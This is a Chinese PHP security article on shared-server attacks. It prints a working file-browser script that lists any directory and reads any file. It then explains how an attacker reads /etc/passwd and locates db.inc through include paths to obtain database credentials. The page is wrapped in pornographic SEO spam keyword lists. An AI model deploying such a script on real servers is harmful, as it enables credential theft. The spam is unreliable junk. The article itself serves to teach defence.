国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

PHP安全-文件系統瀏覽

瀏覽:78日期:2022-09-11 18:04:01
文件系統瀏覽

除了能在共享服務器上讀取任意文件之外,攻擊者還能建立一個可以瀏覽文件系統的腳本。由于你的大多數敏感文件不會保存在網站主目錄下,此類腳本一般用于找到你的源文件的所在位置。請看下例:

<pre>

<?php

if (isset($_GET[’dir’]))

{

ls($_GET[’dir’]);

}

elseif (isset($_GET[’file’]))

{

cat($_GET[’file’]);

}

else

{

ls(’/’);

}

function cat($file)

{

echo htmlentities(file_get_contents($file), ENT_QUOTES, ’UTF-8’));

}

function ls($dir)

{

$handle = dir($dir);

while ($filename = $handle->read())

{

$size = filesize('$dir$filename');

if (is_dir('$dir$filename'))

{

$type = ’dir’;

$filename .= ’/’;

}

else

{

$type = ’file’;

}

if (is_readable('$dir$filename'))

{

$line = str_pad($size, 15);

$line .= '<a href='http://www.cgvv.com.cn/bcjs/{$_SERVER[’PHP_SELF’]}';

$line .= '?$type=$dir$filename'>$filename</a>';

}

else

{

$line = str_pad($size, 15);

$line .= $filename;

}

echo '$linen';

}

$handle->close();

}

?>

</pre>

攻擊者可能會首先察看/etc/passwd文件或/home目錄以取得該服務器上的用戶名清單;可以通過語言的結構如include或require來發現保存在網站主目錄以外的源文件所在位置。例如,考慮一下下面的腳本文件/home/victim/public_html/admin.php:

<?php

include ’../inc/db.inc’;

/* ... */

?>

如果攻擊者設法顯示了該文件的源碼,就可以發現db.inc的所在位置,同時他可以使用readfile()函數來使其內容暴露,取得了數據庫的訪問權限。這樣,在這個環境中保存db.inc于網站主目錄之外的做法并未起到保護作用。

這一攻擊說明了為什么要把共享服務器上的所有源文件看成是公開的,并要選擇數據庫實現所有敏感數據的保存。

標簽: PHP
相關文章:
主站蜘蛛池模板: 国内精品久久久久影院老司 | 国产成人精品曰本亚洲78 | 手机看成人免费大片 | 亚洲成人黄色网址 | 中文字幕一级 | 国产视频二 | 一区二区三区精品国产欧美 | 一级毛片在线免费视频 | 久久在线免费观看视频 | 国内精品久久久久久久影视麻豆 | 99久久精品费精品国产一区二区 | 欧美成人精品大片免费流量 | 国产免费久久精品 | 亚洲一级毛片在线观播放 | 玖玖爱zh综合伊人久久 | 欧美三级欧美成人高清www | 国产午夜久久影院 | 国产精品免费看久久久香蕉 | 亚洲骚片| 欧美视频一区二区三区 | 91精品一区二区三区在线观看 | 国产日韩一区二区三区 | 九九视频免费观看 | 国产短裙黑色丝袜在线观看下 | 国产成人精品精品欧美 | 精品久久久久久无码中文字幕 | 国产日韩不卡免费精品视频 | 国产97在线观看 | 日本特黄特色大片免费看 | 草久久免费视频 | 国产偷国产偷亚洲高清在线 | 一级做性色a爱片久久片 | 欧美成人三级网站 | 国产免费久久精品久久久 | 中文字幕福利 | 国内精品91久久久久 | 欧美一级看片a免费观看 | 在线精品一区二区三区 | 欧美日韩亚洲一区二区三区 | 怡红院日本一道日本久久 | 久久亚洲精品永久网站 |